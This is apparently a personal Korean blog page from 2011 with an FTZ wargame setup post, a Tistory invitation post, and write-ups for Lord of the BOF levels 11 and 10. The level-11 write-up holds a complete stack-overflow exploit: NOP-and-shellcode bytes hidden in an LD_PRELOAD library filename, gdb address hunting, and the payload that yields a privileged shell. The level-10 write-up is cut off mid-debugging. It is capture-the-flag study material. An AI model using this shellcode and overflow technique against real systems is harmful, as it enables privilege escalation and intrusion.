오래되긴했지만 국내에서 유명한 해커스쿨의 워게임 FTZ 서버를 직접 구축하는 방법입니다.
직접 구축해보시면 서버는 이렇게 만드는구나~ 한번 익혀보시고 나중에 기회가 되시면 책이나 검색을 통해
공부하시면서 하실때 도움이 많이 될겁니다.

먼저 VMWare 는 기본적으로 있으셔야 하며 나머지 준비물은 링크로 달아드리겠습니다.

FTZ ISO : http://blueocean95.cafe24.com/ftz.iso

FTZ Red Hat 9.0 : http://www.hackerschool.org/Sub_Html/HS_Service/VmwareLinux/index.html

FTZ Help : http://www.hackerschool.org/HS_Boards/data/Free_Lectures/FTZ_Restore_Manual.pdf

개방적이고 자유로운 티스토리! 10분에게 티스토리 초대장을 드립니다~

XoDNr_ 깝태 — Sat, 08 Oct 2011 01:31:20 +0900

i n v i t a t i o n

티스토리 초대장

+ 남은 초대장 수 : 00

안녕하세요!

티스토리에 보금자리를 마련하시려는 여러분께 초대장을 배포해 드리려고 합니다.

나만의, 내 생각을, 내 기억을 담는 소중한 블로그를 만들고 싶다면 티스토리로 시작해보세요!

초대장을 보내드리고 바로 개설하시지 않으신 분들은 초대장을 회수할 수도 있으니 바로 개설해주세요!

Yes

이런 분들께 드립니다!

1. 다른 블로그를 사용해보셨던 분

2. 이메일 주소가 정상적인 분

3. 블로그를 시작하려는 이유를 남겨주신 분!

이런 분들께 드리지 않아요!

1. 이메일 주소가 의심되는 분!

2. 이메일 주소를 남기지 않으신 분

3. 이유도 없이 달라고 하시는 분!

티스토리 이래서 좋아요!

1. 이미지, 동영상, 오디오, 파일까지! 무한 용량과 강력한 멀티미디어를 올릴 수 있어요!

2. 스킨위자드로 스킨을 내맘대로~ 거기에 기능 확장 플러그인까지!

3. 내가 원하는대로 myID.com으로 블로그 주소를 만들 수 있어요!

[BOF-Wargames] LOB Load of BOF LEVEL11 (Skeleton -> Golem) 문제풀이

XoDNr_ 깝태 — Sun, 04 Sep 2011 23:43:55 +0900

-----------------------------------------------------------------------------------------------------------------------------

Sur3x5f Report - LOB Level11 [ Skeleton -> Golem ]

-----------------------------------------------------------------------------------------------------------------------------

드디어 골렘문제입니다. 부닺쳐봅시다!

[skeleton@localhost xodnr]$ cat golem.c

The Lord of the BOF : The Fellowship of the BOF

- golem

- stack destroyer

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// stack destroyer!

memset(buffer, 0, 44);

memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48)); // 으어 이 망할놈

}

모든것을 초기화 시켜버립니다. 단 소스를 확인해보면 없어진게 하나 있습니다.

바로 환경변수를 초기화 하는 부분입니다. 그렇다고 에그쉘을 사용하고 그러는 문제는 아니고

밤새 고민하다가 해킹캠프때 새벽 5시 쯤 혁이에게 질문해 힌트를 얻어냈는데

바로 LD_PRELOAD와 LD_LIBRARY_PATH 환경변수의 도움을 받아내는것입니다. 이 환경변수들은 공유라이브러리를 지정할때

사용합니다. 고로 이 부분에 입력해주면 이 부분을 먼저 보고 이 부분에 없다면 PATH 환경변수를 참조해라~ 이런 역할을 합니다.

이 친구들은 마찬가지로 스택에 찌꺼기를 남겨 사용할 수 있는데 그 부분을 이용해 공격하면됩니다.

고로 공유라이브러리 파일을 생성할때 파일이름을 NOP 와 쉘코드로 지정해준다음 LD_PRELOAD 환경변수 등록하고

주소찾아서 리턴시켜주어 쉘이 뜨도록 하는겁니다.

추가 ---------------------------------- >

http://linux-virus.springnote.com/pages/1855278

http://codefactory.zc.bz/224

골렘은 스택의 모든 영역을 초기화 시킨다. 그래서 GDB 로 살펴보면 전 레벨에서 사용했던 Argv[0] 까지 이용할 수 없이

모두 골렘이 잡아먹어버리는데 LD_PRELOAD(, LD_LIBRARY_PATH) 라는 환경변수를 사용하면 된다.

LD_PRELOAD 환경변수를 이용해 긴값을 정의하면 스택의 약간의 찌꺼기가 생성된다. 실행을 하고 환경변수를 사용하는데

그 과정에서 찌꺼기가 남기때문에 초기화되지 않게된다.

고로 환경변수로 등록하지않는다면 일반적으로 정의되어있는 라이브러리를 참고하지만 LD_PRELOAD 환경변수를 이용해

자신만의 함수를 재정의하여 사용할수 있게되는것이다.

프로그램 실행 -> 일반 공유라이브러리 로드

LD_PRELOAD 정의 시 : 프로그램 실행 -> LD_PRELOAD 공유 라이브러리 로드

이렇게 되는것이다.

공유라이브러리 파일을 만들어 LD_PRELOAD 환경변수로 등록해주면 되는데 등록할때 파일명과 환경변수명을 NOP 와 쉘코드로

지정을 해주는방법을 사용해보자.

GCC 로 컴파일할때는 -fPIC -shared 명령어를 사용해야된다.

[gate@localhost gate]$ man gcc | grep fPIC

-fpcc-struct-return -fpic -fPIC -freg-struct-return

[gate@localhost gate]$ man gcc | grep shared

-llibrary -nostartfiles -nostdlib -static -shared

-mpa-risc-1-0 -mpa-risc-1-1 -mkernel -mshared-libs

-mno-shared-libs -mlong-calls -mdisable-fpregs

-fshared-data -fshort-enums -fshort-double

vents linking with the shared libraries. On other

Produce a shared object which can then be linked

shared object. Warn about any unresolved refer

shared libraries. This option is not fully func

shared libraries. This is the default for all PA

this compilation be shared data rather than private

operating systems, where shared data is shared be

shared library.

-fPIC 명령어는 공유 라이브러리 파일을 생성할때 사용하는 명령어이며

-fpic 는 CPU 에 따라 이상이 있지만 -fPIC 명령어는 CPU 에 관계없이 고속으로 컴파일한다.

-shared 명령어는 동적 라이브러리 파일을 생성하라는 명령어로 알고있다.

그래서 LD_PRELOAD 에 등록하기위한 라이브러리 파일을 만들때는

gcc -fPIC -shared -o `nop + shellcode` file.c

로 만들어 등록하고 export LD_PRELOAD=`nop + shellcode` 로 등록해주면 된다.

추가 ---------------------------------- >

[skeleton@localhost xodnr]$ ll

total 40

-rw------- 1 skeleton skeleton 12288 Aug 27 21:44 core

-rwxrwxr-x 1 skeleton skeleton 12199 Aug 27 18:02 gole

-rw-r--r-- 1 skeleton skeleton 539 Aug 27 18:02 gole

-rwxrwxr-x 1 skeleton skeleton 5548 Aug 27 21:50 ld

-rw-rw-r-- 1 skeleton skeleton 13 Aug 27 18:04 ld.c

[skeleton@localhost xodnr]$ gcc -fPIC -shared ld.c -o `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

환경변수에 등록해줄때에는 경로를 정확히 지정해주어서 등록해주어야만 합니다. 안 그러면 다른 곳에서의 파일네임 에러가 있을수도 있습니다.

[skeleton@localhost xodnr]$ pwd

/home/skeleton/xodnr

[skeleton@localhost xodnr]$ export LD_PRELOAD=/home/skeleton/xodnr/`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

이제 LD_PRELOAD 의 주소로 리턴값을 설정시킨 후 공격하면 됩니다.

그러면 한번 LD_PRELOAD 의 주소를 찾아봅시다. 먼저 디버깅을 실행해봅시다.

[skeleton@localhost xodnr]$ gdb -q golem

(gdb) b *main+167

Breakpoint 1 at 0x8048517

(gdb) r

Starting program: /home/skeleton/xodnr/golem

argv error

Program exited normally.

(gdb) r `python -c 'print "\xbf"*48'`

Starting program: /home/skeleton/xodnr/golem `python -c 'print "\xbf"*48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Breakpoint 1, 0x8048517 in main ()

(gdb) x/50x $esp

0xbffffa0c: 0xbfbfbfbf 0x00000000 0x00000000 0x00000000

0xbffffa1c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa2c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa3c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa4c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa6c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa7c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa8c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffa9c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffaac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffabc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffacc: 0x00000000 0x00000000

(gdb)

0xbffffad4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffae4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffaf4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb04: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb14: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb24: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb34: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb44: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb54: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb64: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb74: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb84: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb94: 0x00000000 0x00000000

(gdb)

0xbffffb9c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbbc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbcc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbdc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbec: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc1c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc2c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc3c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc4c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc5c: 0x00000000 0x00000000

(gdb)

0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd24: 0x00000000 0x00000000

(gdb)

0xbffffd2c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd3c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd4c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd6c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd7c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd8c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd9c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdbc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdcc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffddc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdec: 0x00000000 0x00000000

(gdb)

0xbffffdf4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe04: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe14: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe24: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe34: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe44: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe54: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe64: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe74: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe84: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe94: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffea4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffeb4: 0x00000000 0x00000000

(gdb)

0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff3c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff4c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff6c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff7c: 0x00000000 0x00000000

(gdb)

0xbfffff84: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff94: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffa4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffb4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffc4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffd4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffe4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffff4: 0x00000000 0x00000000 0x00000000 Cannot access memory at address 0xc0000000

후아......... 스택이 텅 비어있습니다. 혁주에게 힌트를 받은건데 저 멀리 뒷부분도 참조해보라는 힌트를 받았습니다.

그래서 넉넉하게 -3000 부터 스택을 보았더니

(gdb) x/50x $esp-3000

0xbfffee54: 0x00000000 0x0000038c 0x00000000 0x000000cb

0xbfffee64: 0x0000059b 0x00000707 0x00000557 0x00000000

0xbfffee74: 0x00000564 0x00000000 0x00000301 0x0000048e

0xbfffee84: 0x00000550 0x00000000 0x0000067f 0x00000000

0xbfffee94: 0x00000000 0x00000715 0x000005e9 0x0000060d

0xbfffeea4: 0x00000529 0x000003a4 0x00000351 0x000006cd

0xbfffeeb4: 0x000000b9 0x00000679 0x00000000 0x000005e1

0xbfffeec4: 0x00000141 0x00000503 0x00000072 0x0000062d

0xbfffeed4: 0x00000000 0x00000000 0x000005a3 0x0000021e

0xbfffeee4: 0x0000020d 0x00000608 0x00000000 0x00000000

0xbfffeef4: 0x00000706 0x000006f6 0x000006fc 0x0000041b

0xbfffef04: 0x00000701 0x0000062b 0x00000547 0x00000000

0xbfffef14: 0x00000000 0x00000000

(gdb)

0xbfffef1c: 0x0000052c 0x00000171 0x00000687 0x00000148

0xbfffef2c: 0x00000497 0x00000000 0x000002b9 0x00000629

0xbfffef3c: 0x000004f5 0x0000029b 0x00000725 0x00000639

0xbfffef4c: 0x000002ac 0x00000000 0x000006f1 0x00000000

0xbfffef5c: 0x000006a1 0x000004d4 0x000005c9 0x0000029f

0xbfffef6c: 0x000006a6 0x0000045f 0x000006dd 0x000004a6

0xbfffef7c: 0x00000000 0x00000620 0x0000051e 0x00000000

0xbfffef8c: 0x00000584 0x0000069c 0x00000716 0x0000054d

0xbfffef9c: 0x00000527 0x000004ed 0x000003a1 0x00000458

0xbfffefac: 0x00000466 0x0000063f 0x00000000 0x000001ca

0xbfffefbc: 0x00000000 0x0000027f 0x00000000 0x000006ba

0xbfffefcc: 0x0000055a 0x000002b6 0x000000d9 0x0000053d

0xbfffefdc: 0x00000252 0x000004bf

(gdb)

0xbfffefe4: 0x00000000 0x0000071a 0x00000673 0x000005fb

0xbfffeff4: 0x0000023f 0x00000653 0x00000000 0x00000189

0xbffff004: 0x000002a6 0x00000367 0x000003d7 0x00000340

0xbffff014: 0x000005fe 0x000006f3 0x0000056e 0x000004de

0xbffff024: 0x00000306 0x000006a5 0x00000145 0x000000f8

0xbffff034: 0x000000cc 0x000001c0 0x000005f1 0x00000457

0xbffff044: 0x00000712 0x00000703 0x00000226 0x00000513

0xbffff054: 0x4002bb0e 0xbffff128 0x400081e6 0x4002bad5

0xbffff064: 0x4002bad5 0x40013868 0x40014828 0x0000598c

0xbffff074: 0x00000432 0x0000013f 0x0000016e 0x000002f1

0xbffff084: 0x00000000 0x00000420 0x000006c0 0x0000052e

0xbffff094: 0x00005450 0x00000000 0x000004cd 0x00000000

0xbffff0a4: 0x00000000 0x400221c0

(gdb)

0xbffff0ac: 0x00000545 0x40023fd0 0x4001cd70 0x40014828

0xbffff0bc: 0x00000004 0x40014a98 0x00000002 0xbffff0e0

0xbffff0cc: 0x400221c0 0x40014a2c 0x03c40f19 0xbffff15c

0xbffff0dc: 0x4002995c 0x400221c0 0x40014828 0x4002bad5

0xbffff0ec: 0x4002bad5 0x40013868 0x40014828 0x0000590a

0xbffff0fc: 0x00000536 0x0000070b 0x00000167 0x00000555

0xbffff10c: 0x40001402 0xbffff1e0 0x40008134 0x40000c7d

0xbffff11c: 0x40024f23 0x40013868 0x40014828 0x00000f53

0xbffff12c: 0x4000a7fd 0x40014818 0x40014b50 0x00000007

0xbffff13c: 0x4000a74e 0x4010a1ec 0xbffff1e1 0x00000000

0xbffff14c: 0x00000180 0x400221c0 0x4010a710 0x00000000

0xbffff15c: 0x400221c0 0x40000474 0x00000000 0x40000824

0xbffff16c: 0x400002f4 0x40013c00

(gdb)

0xbffff174: 0x00000004 0x40014a98 0x00000004 0xbffff198

0xbffff184: 0x4001dd60 0x40014a34 0x056e90c5 0xbffff214

0xbffff194: 0x40024f23 0x4001dd60 0x40014828 0x000000bd

0xbffff1a4: 0x4002bb0e 0xbffff278 0x400081e6 0x4002bad5

0xbffff1b4: 0x4002bad5 0x40013868 0x40014828 0x0000187f

0xbffff1c4: 0x00000001 0x4001fe70 0x00000310 0x40023fd0

0xbffff1d4: 0x4001cd70 0x40014828 0x00000004 0xbffff218

0xbffff1e4: 0x4000a7fd 0x40014818 0x40014b50 0x40001402

0xbffff1f4: 0xbffff2c4 0x40008134 0x40000ec9 0x40025713

0xbffff204: 0x40013868 0x40014828 0x00001743 0x40024f23

0xbffff214: 0x4001dd60 0xbffff258 0x4000a970 0x40017000

0xbffff224: 0x40108980 0x400c0b00 0x00000000 0x40000ec9

0xbffff234: 0x400707e4 0x00000001

(gdb)

0xbffff23c: 0x00000000 0x00000031 0x40000664 0x00000000

0xbffff24c: 0x40000824 0x400002f4 0x40013c00 0x00000004

0xbffff25c: 0x40014a98 0x00000004 0xbffff27c 0x4001e4f0

0xbffff26c: 0x40014a34 0x00dc28f5 0xbffff2f8 0x40025713

0xbffff27c: 0x4001e4f0 0x40014828 0x40108980 0x40017000

0xbffff28c: 0x00000031 0x4010a1ec 0x40108980 0xbffff2b8

0xbffff29c: 0x4006fa3e 0x40108980 0x40017000 0x00000031

0xbffff2ac: 0x4010a1ec 0x00000001 0x40108980 0xbffff2cc

0xbffff2bc: 0x400711c7 0x40108980 0xbffff2fc 0x4000a7fd

0xbffff2cc: 0x40014818 0x40014b50 0x00000007 0x4000a74e

0xbffff2dc: 0x4010a1ec 0x0804859c 0x00000001 0x40014828

0xbffff2ec: 0x4001e4f0 0x4010a320 0x40025713 0x4001e4f0

0xbffff2fc: 0xbffff9b4 0x4000a970

(gdb)

0xbffff304: 0x40108980 0x00000400 0x4006c2e4 0x40014828

0xbffff314: 0xbffff9b4 0x4006428b 0x40108980 0x4010a1ec

0xbffff324: 0x4000ae60 0xbffffa54 0x00000000 0x00000000

0xbffff334: 0x00002fb2 0x00001000 0x00000018 0x4e5920c4

0xbffff344: 0x0000385c 0x40014828 0x00000018 0x000ed9c0

0xbffff354: 0x00000002 0xbfffe284 0xbfffe254 0xbfffe2cc

0xbffff364: 0x00001000 0xbfffe2cc 0x00000003 0x000f485c

0xbffff374: 0xbfffe3a0 0xbfffe300 0x40013ed0 0x00000808

0xbffff384: 0x00000000 0x00000000 0x0000675b 0x000081a4

0xbffff394: 0x0804859c 0x25000000 0x00000000 0x00000001

0xbffff3a4: 0x00000000 0x00000053 0x00008561 0x000081ed

0xbffff3b4: 0x00000001 0x00000000 0x40001402 0xbffff490

0xbffff3c4: 0x400081e6 0x400013e1

(gdb)

0xbffff3cc: 0x400013e1 0x40013868 0x400013a5 0x40000824

0xbffff3dc: 0x400013d3 0x40013c00 0x40014a88 0x0000000e

0xbffff3ec: 0x40013e80 0x400013d3 0x400014c4 0x00000000

0xbffff3fc: 0x00000520 0x4002bad5 0x400013e1 0x00000000

0xbffff40c: 0xbffff494 0x40000814 0x00000052 0x40000824

0xbffff41c: 0x400002f4 0x40013c00 0x00000004 0x40014a98

0xbffff42c: 0x00000003 0xbffff448 0x40000814 0x400140d4

0xbffff43c: 0x0b725f23 0xbffff524 0x400013a5 0x40000814

0xbffff44c: 0x40013c00 0x400002f4 0x40013c00 0x00000000

0xbffff45c: 0x00000000 0x00000004 0x40014a98 0x00000004

0xbffff46c: 0xbffff48c 0x40000674 0x400140d8 0x01ee5739

0xbffff47c: 0xbffff524 0x40000edc 0x20733868 0xffffffff

0xbffff48c: 0xffffffd0 0x00000000

(gdb)

0xbffff494: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff4a4: 0x00000000 0x00000000 0x00000000 0xbffff9e0

0xbffff4b4: 0x40009c50 0x00005207 0x4001a0dc 0x4001a0dc

0xbffff4c4: 0x00000000 0x00000000 0x00000001 0xbffff9d8

0xbffff4d4: 0xbffff9b3 0x0804859b 0x08048599 0x00000031

0xbffff4e4: 0xffffffff 0x40013c00 0x4001a0d4 0x40010c9e

0xbffff4f4: 0x40000814 0x400138d4 0x40001402 0x400002f4

0xbffff504: 0x080482d0 0x080482d0 0xbffff554 0x00000002

0xbffff514: 0x40023fd0 0x40013c00 0x4000ba15 0x40013868

0xbffff524: 0x40000814 0x400041b0 0x00000001 0xbffff53c

0xbffff534: 0x0804859c 0x000002c8 0x00000000 0x080482d0

0xbffff544: 0x00000000 0x00000000 0x00000000 0xbffff55c

0xbffff554: 0x400075bb 0x40017000

(gdb)

0xbffff55c: 0x00002fb2 0x40013868 0xbffff744 0x4000380e

0xbffff56c: 0x40014480 0x6d6f682f 0x6b732f65 0x74656c65

0xbffff57c: 0x782f6e6f 0x726e646f 0x9090902f 0x90909090

0xbffff58c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff59c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff5ac: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff5bc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff5cc: 0x90909090 0x90909090 0x90909090 0x90909090 // 여기 NOP 코드가 들어가있습니다.

0xbffff5dc: 0x90909090 0x90909090 0x90909090 0x5e11eb90 // 이곳으로 리턴시켜보겠습니당!

0xbffff5ec: 0x32b1c931 0xff0e6c80 0x01e98001 0x05ebf675

0xbffff5fc: 0xffffeae8 0x51c132ff 0x74303069 0x63306969

0xbffff60c: 0xe48a6f6a 0xe28a5451 0xce0cb19a 0x40000081

0xbffff61c: 0x40013868 0x4000220c

(gdb)

0xbffff624: 0xbffffb46 0x00000000 0x00000000 0x00000000 // 아마 이 부분부터 스택인가 봅니다.

0xbffff634: 0x00000000 0x40014a00 0x00000000 0x00000000

0xbffff644: 0x00000000 0x00000000 0x00000006 0x00000000

0xbffff654: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff664: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff674: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff684: 0x00000001 0x00000000 0x00000001 0xbffff56c

0xbffff694: 0x00060000 0x00000000 0x00000000 0x00000000

0xbffff6a4: 0x00000001 0x00000000 0x00000 000 0x00000000

0xbffff6b4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6c4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6d4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6e4: 0x00000000 0x00000000

[skeleton@localhost xodnr]$ ./golem `python -c 'print "\xbf"*44 + "\xcc\xf5\xff\xbf"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Ìõÿ¿

bash$ id

uid=510(skeleton) gid=510(skeleton) groups=510(skeleton)

bash$ exit

쉘이 떴군요...... 욕이 나오면서 기쁩니다 ㅋㅋㅋ

[skeleton@localhost xodnr]$ cd ..

[skeleton@localhost skeleton]$ ./golem `python -c 'print "\xbf"*44 + "\xa8\xf5\xff\xbf"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¨õÿ¿

bash$ id

uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)

bash$ my-pass

euid = 511

cup of coffee

패스워드가 정상적으로 출력되었습니당!

[BOF-Wargames] LOB Load of BOF LEVEL10 (Vampire -> Skeleton) 문제풀이

XoDNr_ 깝태 — Sun, 04 Sep 2011 23:42:31 +0900

--------------------------------------------------------------------------------------------------------------------------

Sur3x5f Report - LOB Level10 [ Vampire -> Skeleton ]

--------------------------------------------------------------------------------------------------------------------------

[vampire@localhost vampire]$ ls

skeleton skeleton.c

[vampire@localhost vampire]$ cat skeleton.c

The Lord of the BOF : The Fellowship of the BOF

- skeleton

- argv hunter

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i, saved_argc; // 새로운 놈이 등장했군요!

if(argc < 2){

printf("argv error\n"); // Argv 2개 이상써야댐

exit(0);

}

// egghunter

for(i=0; environ[i]; i++) // 환경변수 초기화

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf') // RTL 못 쓰게 금지

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){ // Argv[1] 의 내용 초기화

printf("argument is too long!\n");

exit(0);

}

// argc saver

saved_argc = argc; // saved_argc 함수를 argc 로 초기화합니다.

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40); // 버퍼 초기화

// ultra argv hunter!

for(i=0; i<saved_argc; i++)

memset(argv[i], 0, strlen(argv[i])); // 인자를 모두 초기화 하는 막강한 놈이군요 -_____- ;

}

인자를 모두 초기화하는 진짜 말 그대로 더러운 놈 입니다.

어떻게 공격을 해야할까요... 보면 Argv[0] 은 프로그램이 실행되면 찌꺼기가 스택의 꼭대기로 올라가는

특이한 성질이 있습니다. 그러니깐 트롤처럼 Argv[0] 에 NOP 와 쉘코드를 넣어주고 소스로 찾는게 아닌

직접 GDB 로 분석해서 꼭대기로 리턴시켜주어야 합니다.

꼭대기에 어떤 찌꺼기가 있는지 확인해보도록 하겠습니다.

[vampire@localhost xodnr]$ ./skeleton aa

stack is still your friend.

[vampire@localhost xodnr]$ ulimit -c unlimited

[vampire@localhost xodnr]$ ./skeleton `python -c 'print "\xbf"*48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[vampire@localhost xodnr]$ gdb -q skeleton core

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...ddone.

Reading symbols from /lib/ld-linux.so.2...idone.

#0 0xbfbfbfbf in ?? ()

(gdb) x/50x $esp

0xbffffb30: 0x00000000 0xbffffb74 0xbffffb80 0x40013868

0xbffffb40: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffb50: 0x08048500 0x00000002 0xbffffb74 0x08048390

0xbffffb60: 0x080486ac 0x4000ae60 0xbffffb6c 0x40013e90

0xbffffb70: 0x00000002 0xbffffc66 0xbffffc71 0x00000000

0xbffffb80: 0xbffffca2 0xbffffcc4 0xbffffcce 0xbffffcdc

0xbffffb90: 0xbffffcfb 0xbffffd0b 0xbffffd24 0xbffffd41

0xbffffba0: 0xbffffd4c 0xbffffd5a 0xbffffd9d 0xbffffdb0

0xbffffbb0: 0xbffffdc5 0xbffffdd5 0xbffffde2 0xbffffe01

0xbffffbc0: 0xbffffe0c 0xbffffe19 0xbffffe21 0xbfffffe4

0xbffffbd0: 0x00000000 0x00000003 0x08048034 0x00000004

0xbffffbe0: 0x00000020 0x00000005 0x00000006 0x00000006

0xbffffbf0: 0x00001000 0x00000007

(gdb)

